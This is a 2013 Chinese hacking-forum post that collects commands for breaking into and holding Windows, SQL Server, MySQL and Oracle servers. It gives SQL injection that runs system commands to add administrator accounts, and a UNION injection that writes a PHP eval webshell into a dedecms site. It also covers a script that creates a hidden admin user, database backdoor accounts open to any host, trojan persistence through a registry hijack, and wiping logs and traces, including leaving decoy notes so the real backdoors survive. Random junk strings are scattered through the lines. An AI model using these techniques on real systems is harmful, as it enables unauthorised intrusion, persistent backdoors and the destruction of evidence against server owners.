找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4933|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

3 g' @+ i" c/ U. X. `1.net user administrator /passwordreq:no
, y2 C# e7 H3 ?& C5 d% y这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了3 i4 _, [" K2 ~8 _# o
2.比较巧妙的建克隆号的步骤3 f2 F' j" F) w1 u
先建一个user的用户
2 A7 `7 t1 a/ X$ g$ D( c9 z然后导出注册表。然后在计算机管理里删掉6 R) h# i7 U9 u9 r& _
在导入,在添加为管理员组
2 e% j% K( \- |  B3.查radmin密码: d! z- Q/ h/ _# ~: K
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
9 W; ?+ E* {' g& {2 Q- E; s+ t4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]: h0 R$ |. g: R5 g* p" K
建立一个"services.exe"的项8 J3 j% e. J- Q: Q' P) L
再在其下面建立(字符串值)
# B( s; D8 i6 K$ b( O; i& ~键值为mu ma的全路径
: |. m1 Q+ ?* I1 d  B' M5.runas /user:guest cmd
4 J7 u) G8 A& a: X" \( r. J! p测试用户权限!
0 s7 N5 B9 A) d/ J7 y6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?( x% y) s- Y4 R+ ~& f
7.入侵后漏洞修补、痕迹清理,后门置放:
: n5 ?' F3 }( {% V! w! O; r基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门" {; o% k; Q: c3 q5 _- `
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
2 S& I" y7 C1 K; S; v& f  w" g
1 P" ^: r5 \% r* t2 @6 P" }9 H7 Z3 Afor example
. K/ @  d* x8 D6 G4 Y: j# {* a. Z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
. n5 p4 Y, j+ i. i# _! f7 m) R
: ~4 ]- `' P3 Z* _5 S$ v# ~2 ]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
9 [! B5 Z; V. @0 N" b" r1 m, D) d% d3 V5 B3 {2 n, @
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
; T( }' W: j3 D/ A4 j如果要启用的话就必须把他加到高级用户模式5 M6 {+ }8 c. u. f5 Y3 D7 ?
可以直接在注入点那里直接注入
9 O0 R# D3 O# P' lid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
- I+ V: [' o9 }8 b  G然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--4 y) v3 \6 [6 e% V% ^  h  m
或者
3 a# y& S( u; Ksp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
: r1 {: y# O" E1 ]( b. b来恢复cmdshell。
9 g9 m" T1 a6 K; R8 O' q$ B
4 }' W6 ~, O' a6 {+ g分析器
) r9 k7 B# x; z1 E/ V4 b9 EEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
1 H: z8 M; Z2 T: U# ]' E- g然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
, E8 E' I; v5 l# z( j4 g" `10.xp_cmdshell新的恢复办法! h$ q! \6 k; _; h6 e7 b
xp_cmdshell新的恢复办法, O9 d* F/ o) G) r
扩展储存过程被删除以后可以有很简单的办法恢复:
, O- }6 }0 v& \4 |% q删除: I5 o9 n9 T& u! }1 v
drop procedure sp_addextendedproc9 v; s3 f5 p( I, i2 d7 _
drop procedure sp_oacreate2 H; d( `- M, b& e9 s& V( t
exec sp_dropextendedproc 'xp_cmdshell') }, v+ |/ d( _) u5 _- x

$ d7 Y9 Y% E. ^, b: L恢复4 v8 m& C0 f. T. e; B
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
) E1 B- R& b* Q  z( ?; v- m/ Jdbcc addextendedproc ("xp_cmdshell","xplog70.dll")
) y$ h# b3 m+ J& X/ @1 ]9 `
' D9 m) G5 ^( j这样可以直接恢复,不用去管sp_addextendedproc是不是存在
# J( C/ g- B( e; E. h$ ]8 N" q4 u
-----------------------------
1 l5 K! |) U5 G
- n3 I9 ^; W5 F4 L7 J删除扩展存储过过程xp_cmdshell的语句:3 S, O7 w. j* X) p% S
exec sp_dropextendedproc 'xp_cmdshell'3 U5 h% |+ X4 K+ }3 U& `9 r# r/ |

5 |9 C1 P, `0 Z! }) Z) H. Q恢复cmdshell的sql语句
  ?$ [2 w% y+ W4 W: kexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll': d# U6 O# z' Z, ]! B
+ C6 T- k2 c0 ^7 a' l5 Y

3 z: ?) u6 k1 I7 b1 t开启cmdshell的sql语句  f2 v% \5 D; |- z; i! d4 L
$ @. \; N; D8 }4 E
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
- g$ T1 b, b( z. {6 w  u( Y9 f2 T$ Z5 `' _; {
判断存储扩展是否存在* B% L2 U6 {: _2 d
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'% E0 X0 K* g+ B2 ~- Y; S0 M; u  z
返回结果为1就ok
1 ~/ ~$ s  `' A2 C" G) J3 [- ~, I4 F  Z* G/ i; w
恢复xp_cmdshell) [* ?) f0 T, b; f- M; \9 t
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
  [& N0 q+ G' H/ F+ h/ }8 F返回结果为1就ok
  w2 X' P9 g7 }. \+ B/ |6 R! z2 F. H! s4 R. P" g9 j5 f  c( ?( n
否则上传xplog7.0.dll
7 a& a$ w& X' u8 O0 w. w6 c& Y8 \exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
4 Z5 x$ T+ y" Z) I; w. }  s/ W6 [/ y- L$ `8 j" r, l* d& A
堵上cmdshell的sql语句. x/ @* |8 {$ x' v$ T! t
sp_dropextendedproc "xp_cmdshel
3 o6 {0 q& e1 L3 S- V/ {: l-------------------------
) M% A: f5 `  ^1 ~清除3389的登录记录用一条系统自带的命令:# c  l9 X0 {& b# i1 O3 N
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f( p( V# {: J, _2 k( c

2 t# N/ ]+ b8 s9 z- I" F7 r  _然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
0 V  ]! G4 A$ S: W2 M+ N) _  l在 mysql里查看当前用户的权限
/ e  B" C" b+ D, Hshow grants for  & g8 C1 ?: g! B0 {+ ~
% j# H* ]  Q: k  F
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
5 N( G* g1 g  R& J/ g
0 q6 @- r7 ?* L' \3 G
/ o3 ?6 e. A) ~8 i# [2 ]Create USER 'itpro'@'%' IDENTIFIED BY '123';
# R: k+ F+ N& `( E/ k
# `6 n' [+ k  `GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION/ U1 J1 b7 ?, X( b4 }
, s5 X* _0 `$ v* W5 j7 A
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0  h) Y4 ]' l8 _6 S! l: _

7 y7 n, @' k4 O$ }  l4 {  }" hMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
5 ?, @# U; y/ ~2 A, d1 s2 p. @- V- f0 [* P: F; {9 v
搞完事记得删除脚印哟。+ N2 p5 M- O$ y$ i
+ ^2 u$ p. m( v: D8 V# p( D  K
Drop USER 'itpro'@'%';3 k5 W1 w3 C8 q3 o7 _1 o
1 x+ [8 ~' {9 Z' k& Q
Drop DATABASE IF EXISTS `itpro` ;* P7 V' I% g8 l4 E0 Z6 ?9 W, r+ T
' c+ V! |2 m0 D' m4 b1 X
当前用户获取system权限6 [# T7 R5 K$ {  i+ r) h  G
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
/ C- F: {% z) t% u9 \sc start SuperCMD/ m, ]' y7 N# o3 F  D+ B0 g5 X* |; `
程序代码
& R# D% b2 m9 s- P* I9 J/ R+ A<SCRIPT LANGUAGE="VBScript">
+ z. D  ]" q) @set wsnetwork=CreateObject("WSCRIPT.NETWORK")
8 ]' c& X8 \8 H6 M  t' aos="WinNT://"&wsnetwork.ComputerName8 Y2 C% {8 H2 x  m& W/ h
Set ob=GetObject(os)
8 l  }3 Q& r; M5 fSet oe=GetObject(os&"/Administrators,group")
% G2 Q) Q+ O$ G  D9 jSet od=ob.Create("user","nosec")+ M/ A2 Q: y6 {3 ?
od.SetPassword "123456abc!@#"# D% v! W0 N9 U8 y6 t
od.SetInfo
6 s) G* L$ ~4 E$ D2 o( o0 XSet of=GetObject(os&"/nosec",user)2 Q+ b( J/ b# B1 S
oe.add os&"/nosec"
/ _  E' x8 y! M- d0 E% I</Script>
6 P) ^4 X2 B( N( G% @4 d<script language=javascript>window.close();</script>2 n+ e4 ~% s3 k; G

1 G  ~' _% T- M0 R  C9 U1 D: |, }  y. Z) S2 p+ h9 b% G
* R" M9 S9 A% \# ]5 k) `; _7 c1 X
# l( N4 A% t0 g1 n
突破验证码限制入后台拿shell
3 u0 a/ P* c: G2 T9 r程序代码
+ y; i% p9 `7 fREGEDIT4 0 u) ?. q, h0 o7 |; j. X& a
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 9 R, K4 a5 l2 ^: u9 H" G
"BlockXBM"=dword:00000000
# m0 h+ v) _' V1 ?  t# T8 P( I# ^$ ~* V
保存为code.reg,导入注册表,重器IE
& F& q8 g+ s5 B  }就可以了
7 |# I+ o; a& K% K8 Punion写马
8 \7 a8 X$ \- {% t( h! o1 }. g5 z程序代码
5 q) M  C# V: ]5 }www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
6 O+ C% B" X1 n+ a* a$ e$ v  Q+ J) P1 d6 y: P) o% ]" X
应用在dedecms注射漏洞上,无后台写马
$ v, b  H. g; _- b! j/ T2 Hdedecms后台,无文件管理器,没有outfile权限的时候
! @& u5 [+ Y, S' @( p- m在插件管理-病毒扫描里
' R& X+ T1 W% T: x+ q, P; q写一句话进include/config_hand.php里
" R  x5 }; h4 g程序代码
3 d+ q5 W0 {; z: L( F1 A>';?><?php @eval($_POST[cmd]);?>, j/ ^& N9 q  M2 l
% A* }: X3 Y* U3 S! D
) m2 [+ Y/ e  y9 v4 X" x1 K3 P
如上格式
% M6 p' ?7 E* ]% M4 Q$ _9 U% d" ]2 e. F$ |" k- k/ F  q) l* a$ i( E
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
+ H; E0 e3 l  R2 ]: t5 j程序代码3 r: W6 j  l" X, ?
select username,password from dba_users;, _4 R1 \4 h9 N# |: J& A- y

/ r, F  J% H& z- w5 d; }
: ^) L+ U3 R& L, N7 }mysql远程连接用户
7 d6 M$ s  u5 Q. A8 Z程序代码5 x! z6 y) N5 |% P2 d' m! n3 t

& ^: Y. c0 q4 d  b5 ?Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';2 u/ |5 Z! @! R9 C1 i1 |2 T
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
" Z, z4 ]7 S# P7 p6 mMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0. `  y9 B$ c2 n' k
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;" ]: x* G& ~; I0 R$ ^) `

. Z9 |5 X8 r% U2 x: ?( \4 ~/ ~# Z( Z% N" G* r% G& [) Q

  p- \4 @4 F  W. ?5 h, t  C( T* l
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
+ K: W* R0 H* a
( ^; i$ s  h, x- q8 n1.查询终端端口
6 l- o; Y  y* L+ X3 n. T0 H+ @
+ X& w$ l$ I8 H8 ]1 d3 R1 @( \/ j8 kxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber9 _  w- ~% F' S: _1 m
/ T- @3 T! W0 }, `9 y3 b1 L
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
1 s9 x6 m+ j7 @* _6 ?) G! Z# |type tsp.reg% ~+ t  M! e$ ^/ m: T) L

# Q% i3 s2 N/ }4 |2.开启XP&2003终端服务
+ D1 ]6 r% v3 f/ V1 E$ D
& b9 g5 ?+ w8 v  P  `, o+ V
, }$ J  Q: Z9 @# a- T, kREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
& X3 _. I% R) y! U; f, @( C7 O5 g( b0 j& ^0 B; a
- ?! Z+ z- b5 o7 p. i5 x
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
! P: U* n2 ?. F# _$ k; d  x+ A: h$ v  t8 D/ ]) L6 e
3.更改终端端口为20008(0x4E28)
1 ~9 F& I0 g) V" g! l  r: Z; x- u0 K) |9 B% `3 n
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
, n  h! c+ L# X0 j
& A& J0 Z9 z9 d: {2 v: }3 x8 r* N" cREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f0 k  V* c, C6 L3 a
* S) e* `+ M) _2 F
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制' r; N3 S4 p$ |  S

2 V- X2 h' Z3 E% ]" _" s1 BREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
! j  T. _- R7 a* [, [+ f; K% P7 D

' t- n' L" O) W& Y5 Q" |+ @5.开启Win2000的终端,端口为3389(需重启)
* G  u5 @4 U; E1 n. Z
2 h4 e& G- h! z% K6 z6 Fecho Windows Registry Editor Version 5.00 >2000.reg 5 O+ m: K9 @8 }' S/ Z
echo. >>2000.reg
  @# {  e. d: @8 E5 N9 hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
( v/ j& _' U( |echo "Enabled"="0" >>2000.reg * @2 F5 U. j4 z6 K% k6 [
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg , Q5 |3 W3 U) T7 J; ?' O4 G" o
echo "ShutdownWithoutLogon"="0" >>2000.reg . U" m) `: a2 I! B: s9 @+ Z* A
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg : @. ~) {1 M8 ^8 K1 S
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
& D7 E# t: D3 \( [- R) Q2 P/ R. E+ Gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 7 j5 U" l! B% q% M* E- w2 y
echo "TSEnabled"=dword:00000001 >>2000.reg 5 X4 n8 u+ ^2 U1 N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
5 P+ n) b' Q. h6 U4 z) Uecho "Start"=dword:00000002 >>2000.reg 4 i. z4 S9 M+ S; J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg - J: D* C( U; j1 w
echo "Start"=dword:00000002 >>2000.reg
  G8 i. i" H& I% `6 Lecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg ; ]) Q2 J% n3 D- S
echo "Hotkey"="1" >>2000.reg
. F' K% X& e) z0 ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
5 |! J$ B5 V8 g/ techo "ortNumber"=dword:00000D3D >>2000.reg
, j' C5 r) w( r. i& p* M2 }4 J6 qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 1 o5 c% {( n, }
echo "ortNumber"=dword:00000D3D >>2000.reg
/ P+ i# ]7 \3 t  _9 q0 b/ X; n+ q' Q3 _) U
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)1 @9 |; @0 i9 m1 ]- o# Q8 E, W/ k
; V% O7 m: Y( ]6 j$ O8 |: b
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf( ~% L" ^2 C% t" o; C  E! Q( O( Z3 B
(set inf=InstallHinfSection DefaultInstall)
4 D" o# t* c- a6 H# Oecho signature=$chicago$ >> restart.inf2 ^7 h" y* [. y5 O7 y, ]
echo [defaultinstall] >> restart.inf
: Y8 l+ G1 j0 Z% W! q% i$ k7 Yrundll32 setupapi,%inf% 1 %temp%\restart.inf
5 ?4 Q; E; K6 f2 ]0 C6 B) [
3 J) {3 q( _7 K( S; t! l: O( ?- t: M3 [% B
7.禁用TCP/IP端口筛选 (需重启)$ ]. N- t5 I' z! o/ M! T2 B
6 k9 ?. f' {* q8 x% d& Z. Y: j
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f" D1 u2 \) n' q, u& Q* ~4 O% I

- s( R5 Y6 i5 ?9 H2 B0 e8.终端超出最大连接数时可用下面的命令来连接
" u6 T: Q( C# G5 g3 x9 }* M9 p
. q8 O+ O9 u5 p+ v" Gmstsc /v:ip:3389 /console
) l3 e. P2 _$ j* y2 {9 Q- D4 r$ a  _/ g- Q6 ?+ v# `
9.调整NTFS分区权限# V4 v# M  ^( I3 l7 ]
# i8 N/ o9 J  @: j9 r4 K, |
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)3 `3 F- N  @# V. C# [" U& w3 X% E$ _4 w
5 u6 x/ k- a1 p
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)% |" `1 ~. I; A7 Q8 e& t
, R2 y2 P7 }8 p" e. |8 Z: T/ c
------------------------------------------------------
; v2 G% s& F- w" w/ J3389.vbs & R/ M' h/ F- h$ T3 P1 o* \+ X, V
On Error Resume Next2 |8 t4 K! X' M" s' a
const HKEY_LOCAL_MACHINE = &H800000029 D; E; Y' {0 V+ d& @$ U. B, P
strComputer = "."( X7 I" ]. N6 i& ~1 p
Set StdOut = WScript.StdOut
3 L9 D' P+ `+ x! P2 l% l3 @# o  m8 }% r0 [Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_" y, C7 J4 c/ m. ~' j
strComputer & "\root\default:StdRegProv")
5 e( f1 D0 C/ x3 @0 u' XstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
) e5 U2 ~0 b0 ]! M/ F- t% L# [oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
; o6 |3 {7 X/ v" b) ^& R  nstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"  A1 h" C+ t' O( F! s/ z
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
2 E& U  Y: f7 U5 F. k$ O# hstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
) I' s9 |+ t9 L/ PstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
3 W# u6 l5 W2 F! R& n: U0 FstrValueName = "fDenyTSConnections"
& g' e/ U! z" N0 {/ e6 @6 n1 kdwValue = 0
2 z! @) _4 y% _3 E* zoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
# |$ R: f( ?$ m  lstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"& O% Z! w; l. t; H) x
strValueName = "ortNumber"
9 G* T% t: X* A6 _# y* b$ SdwValue = 3389
; ^7 u$ L2 Y+ g' ooreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
2 l/ h0 e7 y# }) x' IstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"! _$ I+ P8 H- \# Z
strValueName = "ortNumber"
6 @, {/ b6 m( b4 Y5 BdwValue = 3389
/ o7 p8 I7 U7 U* v* Poreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
3 D. a9 @) ?/ Y4 {3 aSet R = CreateObject("WScript.Shell") 7 H, L1 B6 o- j7 n; J) W3 o, d
R.run("Shutdown.exe -f -r -t 0")
, N' g& g1 k  Q& n8 |  y! @
4 W2 }- p. @# T) {3 o/ }% ^6 T/ Z删除awgina.dll的注册表键值* H8 V4 V2 n8 x3 E, b
程序代码& X( z( a, @, ?6 P# d- i$ Q

3 ?) z' N. k$ R9 r) d- O* b) ureg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f% T- k5 N% N  f- E( U
) z7 P! T% R! m( D2 s

7 ]; B9 [& @5 r. i) a" Y3 f% D% D9 f- v) l

! b0 T8 ?- s) Q0 ?程序代码
3 p/ J0 X: l; @3 |: EHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash! z$ @" M# m5 Q- \

' r( S( }. G- y6 d' _' r, K/ F设置为1,关闭LM Hash  W. f% @9 n9 N2 @& U

: t! V% |8 ]5 y6 x+ O数据库安全:入侵Oracle数据库常用操作命令
. c( }( D/ S# t" `# `' p- K7 p最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。. m) E0 J" D- O  O' G
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
' T7 ^/ ]# ]2 J2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;: j2 ~7 V( J! s8 A9 P8 B
3、SQL>connect / as sysdba ;(as sysoper)或
9 Q1 Q, {+ H  g) l7 ?connect internal/oracle AS SYSDBA ;(scott/tiger)7 H, J6 V' c+ S# d4 u: ~6 m0 r/ s
conn sys/change_on_install as sysdba;
7 q- I: Q% n7 W: C' O0 o* q: |' [4、SQL>startup; 启动数据库实例
3 }0 G+ Q0 ~- ^3 |3 m5、查看当前的所有数据库: select * from v$database;
  r) ?2 ~+ h8 Y5 a  e) hselect name from v$database;
$ ~9 s/ j( [) V" \# W' H6、desc v$databases; 查看数据库结构字段9 f0 F0 a. g7 l5 k8 W0 l5 k: H  X
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
1 j; S- k& U7 N% ySQL>select * from V_$PWFILE_USERS;
- S8 a3 s/ m$ X' [& ]Show user;查看当前数据库连接用户/ H* d6 \* W* m+ `/ J
8、进入test数据库:database test;+ G* U5 k) P1 P5 q+ ]0 l
9、查看所有的数据库实例:select * from v$instance;
9 u0 R! t+ Y2 \0 z2 a' y如:ora9i
- M' m* r7 ^; _5 F. \! a10、查看当前库的所有数据表:, G+ y- H& I4 }) q0 E
SQL> select TABLE_NAME from all_tables;4 z& b8 g: V2 _7 C, {% J8 f
select * from all_tables;
: H4 W7 C3 D% |2 I5 x. O+ T, }SQL> select table_name from all_tables where table_name like '%u%';9 u. k6 M5 Z# |) l) q9 _$ B3 R
TABLE_NAME
- v- G9 O; F- K6 r* O4 L6 U------------------------------8 y4 L8 T/ k8 z* \% u2 S8 j. Z
_default_auditing_options_
5 T" G, e$ e% \2 x11、查看表结构:desc all_tables;6 K  _* W- }# n+ N% ]) E
12、显示CQI.T_BBS_XUSER的所有字段结构:
, W6 B! r+ p* kdesc CQI.T_BBS_XUSER;/ Q' M* h! r9 s+ j  c8 a. b, J( _
13、获得CQI.T_BBS_XUSER表中的记录:# Z2 f/ X9 \% _. U# ~  l
select * from CQI.T_BBS_XUSER;
( D( g/ M+ j) I6 ]' e" S. X14、增加数据库用户:(test11/test). v# C+ w! f, J$ S$ f) e, O# }# y
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
6 V$ }8 a( K. q15、用户授权:- {% n- g/ R# C" J, \% {: C( ~
grant connect,resource,dba to test11;  D) C' p, o$ J; D! l
grant sysdba to test11;
# ~( \$ J4 w% `. t$ U. H2 ucommit;
7 t4 z8 l# V- B8 ~# P' ]* k16、更改数据库用户的密码:(将sys与system的密码改为test.)/ Q4 G* e8 k- {: y& w: L
alter user sys indentified by test;
% H" H- a  F( Q, f7 }: Palter user system indentified by test;8 G  A1 a- k+ |, V& t+ n
3 q" a! B% ^% |3 k7 K2 _5 j* d0 }8 }
applicationContext-util.xml4 y0 X4 _# T6 d4 y# e  G) ?
applicationContext.xml) h2 e% Z4 A* P( T
struts-config.xml' P- g! A2 k2 h6 x' e' ?! ?
web.xml4 y5 _: Q6 h5 N3 p* @* K3 p% E
server.xml
; {# C4 r1 {8 S* Q8 n. @tomcat-users.xml
3 Y- U9 G$ E/ k) w0 T+ Q1 W3 j. Bhibernate.cfg.xml" F( {* Y+ S% i6 [4 s2 H& ?6 F
database_pool_config.xml
9 q* ^' z6 K, R. t1 }/ \" C, t# N' C& F( _/ ]

" H0 j% C" f: n6 K\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置% s  F% i: k5 k+ k! i8 A1 i  D' [
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
/ G2 l1 a$ A. ~* u\WEB-INF\struts-config.xml  文件目录结构9 g6 T6 L2 I7 J) [, {

6 p" w% M2 k/ m8 E$ V7 I0 T0 pspring.properties 里边包含hibernate.cfg.xml的名称7 h0 F! ?$ g+ N4 V. |

1 A0 `5 {) t7 y, s% b0 u7 L) W1 J4 ^
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
. h8 r: [- N. r! ]* u- M0 _+ B3 |5 m9 Q2 c$ G
如果都找不到  那就看看class文件吧。。
1 ?7 }& Z8 E. A2 V& z& g
! s. z% @) [7 M3 R' s7 e# x, z测试1:
( }5 m  q  o0 k+ b* Z  b! YSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1: ]' i& p" I$ S
% I. P  Q. W. b) e; }7 V- R
测试2:
- ?% z" }& c  K* ^2 k- O$ z. ~- F( b$ ]) c4 Y
create table dirs(paths varchar(100),paths1 varchar(100), id int)( m; p- S6 m5 ~* B' @$ ~$ l
0 T8 a* W/ C+ v4 \: o# |4 C/ g
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--* v7 E, X* m9 \0 L8 Y5 ]2 T/ O/ B3 z9 J
$ y( H$ f4 {2 K2 ?1 x( t# Y
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
- W$ K! u" k$ A7 [
; |5 U4 w! y- n6 S  B查看虚拟机中的共享文件:, s/ ~4 z6 q' r* X5 s, k2 Z( M
在虚拟机中的cmd中执行: `' F- R5 V/ `$ N) w5 C7 \' q+ d
\\.host\Shared Folders
, j6 p! Z6 Z5 @5 Y0 S: X) E
# _  s8 K+ p: S- T+ W& i" _cmdshell下找终端的技巧
( J2 g! p! F0 F4 f找终端:
  }; [( v6 r$ j3 y' H% M0 ^第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
